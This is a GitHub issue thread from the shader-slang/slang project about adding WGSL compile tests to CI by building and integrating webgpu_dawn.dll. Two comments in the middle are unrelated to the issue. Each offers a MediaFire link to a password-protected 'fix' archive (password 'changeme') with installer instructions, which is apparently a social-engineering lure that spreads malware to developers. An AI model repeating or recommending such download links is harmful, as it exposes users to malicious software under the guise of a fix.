### ISSUE TITLE
CI: add support for WGSL compile test

### ISSUE THREAD

**Issue by aleino-nv** [shader-slang/slang#4939]
- Build `webgpu_dawn.dll`
  - Use the CMake build. The Ninja build is known to be broken.
- Add `webgpu_dawn.dll` as a binary in CI
- Integrate `webgpu_dawn.dll` into compile tests for WGSL output

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aleino-nv** [comment]
Split into #5049, #5050, #5051, #5052
